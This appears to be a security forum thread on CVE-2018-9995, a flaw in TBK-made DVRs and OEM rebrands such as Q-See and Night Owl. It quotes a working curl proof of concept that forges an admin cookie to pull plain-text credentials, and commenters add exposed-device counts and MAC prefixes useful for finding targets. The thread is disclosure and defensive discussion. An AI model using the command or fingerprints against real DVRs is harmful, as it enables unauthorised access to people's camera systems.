Exploit Provides Plain Text Credentials For TBK, Q-See, Night Owl, And Other DVRs

A vulnerability which provides plain text credentials for affected DVRs was discovered by Argentinian researcher Ezequiel Fernandez. This vulnerability is is outlined in CVE-2018-9995.

The DVRs affected are manufacturer by TBK as well as OEM'd by:

  • CeNova
  • DVR Login
  • HVR Login
  • MDVR Login
  • Night OWL
  • Novo
  • Pulnix
  • QSee
  • Securus
  • XVR 5 in 1

The exploit, tested by IPVM, is a simple CURL command:

curl "http://IP_ADDR/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

This PoC is tested and working as shown below. The command is issued on a vulnerable DVR (IP address obscured), and the password is returned (obscured / replaced with red PW).



The plain text credentials returned from this command granted admin access to the device.

Agree: 2
Disagree
Informative: 1
Unhelpful
Funny

opt=user&cmd=list

Obviously they really tried hard to hide this backdoor ;)

Agree: 3
Disagree
Informative
Unhelpful
Funny: 2

The key here is probably the cookie...

-H "Cookie: uid=admin"

Like the recent Hikvision cloud exploit, it looks like these cameras are taking the "logged in" user value from the cookie. "You're the admin you say? Come on in!"

If you're going to use cookies, it's trivial to use a simple token. Generate a token on login, let the user store that token in a cookie, and if the user supplies an expired or unrecognized token, force login again. Anything is better than letting the user decide what level of privilege they should have.

Agree
Disagree
Informative
Unhelpful
Funny

 Do they have a businesses presence in the US?

Agree
Disagree
Informative
Unhelpful
Funny

TBK is Spanish company, however OEMs like Q-see and Night Owl can be found at big box retailers in the US like Best Buy, Home Depot, Walmart, Coscto, and more.

Agree: 1
Disagree
Informative: 1
Unhelpful
Funny

John, 

Q-See is OEMing TVT and Dahua, at least for the past few years. 

Night Owl is HIkvision and Raysharp for the past few years as well. 

I would be interested  to see the models from TBK for these brands. 

Agree
Disagree
Informative: 1
Unhelpful
Funny

There are ~1.5k vulnerable units online in the US, out of ~55k total vulnerable units online worldwide.

The VR4104 and DVR4216 series from TBK are vulnerable.  I am not sure what those model numbers are at the OEMs, but will look into it and report back here with anything I find.

Vulnerable Q-See Login:

DVR_login_4

Vulnerable Night Owl Login:

DVR_login_5

 

Agree
Disagree
Informative: 1
Unhelpful
Funny

Has anyone created a map for vulnerable devices, similar to the Hikvision one (IIRC)? You could knock on some doors of people who have these kits and say, would you mind if I show you how insecure your camera system is? If they say yes, show them the vuln and offer to correct the issues. Someone could make a business out of doing just that for all of the vulnerabilities we see here.

Agree
Disagree
Informative
Unhelpful
Funny

Does anyone have the MAC prefix for their devices?

 

Agree
Disagree
Informative
Unhelpful
Funny

Sean - Here is a list of the affected brands and the associated OUIs:

Brands

TBK
CeNova
DVR Login
HVR Login
MDVR Login
Night OWL
Novo
Pulnix
QSee
Securus
XVR 5 in 1

OUIs:

00:06:1B
00:0C:DF
00:12:DF
00:12:FE
00:14:65
00:27:1A
00:59:07
08:A5:C8
0C:CB:85
14:1A:A3
14:30:C6
14:36:C6
14:9F:E8
1C:56:FE
1C:AB:01
20:76:93
24:DA:9B
30:4B:07
34:BB:26
38:80:DF
40:5A:9B
40:78:6A
40:88:05
44:80:EB
50:3C:C4
54:2B:57
54:C5:7A
5C:51:88
60:31:3B
60:99:D1
60:BE:B5
60:D2:1C
60:D9:A0
68:C4:4D
6C:5F:1C
70:72:0D
74:04:2B
74:AE:76
80:58:F8
80:6C:1B
80:CF:41
84:10:0D
88:6B:44
88:70:8C
88:79:7E
88:B4:A6
90:68:C3
98:FF:D0
9C:D9:17
A0:32:99
A4:70:D6
A4:8C:DB
A8:96:75
AC:38:70
B0:79:94
BC:FF:EB
C8:DD:C9
CC:07:E4
CC:61:E5
CC:C3:EA
D0:04:01
D0:77:14
D4:22:3F
D4:63:C6
D8:71:57
DC:BF:E9
E0:0B:28
E0:2C:B2
E0:75:7D
E0:98:61
E4:90:7E
E8:91:20
EC:88:92
EC:89:F5
F0:D7:AA
F4:F1:E1
F4:F5:24
F8:CF:C5
F8:E0:79
F8:F1:B6

Agree
Disagree
Informative: 2
Unhelpful
Funny

Amazing!  Thanks!

Agree
Disagree
Informative
Unhelpful
Funny

Manufactured by TBK, a spanish company? Are they really manufactured in a spanish country?

Agree: 1
Disagree
Informative
Unhelpful
Funny

Those dvr’s were designed and manufactured by Streamax, China.

Agree
Disagree
Informative
Unhelpful
Funny

TBK looks like TVT to me.  QSEE often uses TVT

Agree: 1
Disagree
Informative
Unhelpful
Funny

This is correct. TBK is actually just a TVT OEM.

Agree
Disagree
Informative
Unhelpful
Funny